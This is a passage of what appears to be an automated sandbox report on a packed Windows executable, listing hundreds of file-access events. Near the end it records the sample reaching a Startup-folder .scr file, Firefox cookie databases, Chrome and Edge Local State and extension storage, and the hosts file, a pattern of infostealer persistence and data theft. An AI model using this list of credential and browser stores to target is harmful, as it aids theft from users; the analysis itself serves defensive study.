              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \System\Antivirus.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformationJump to behavior
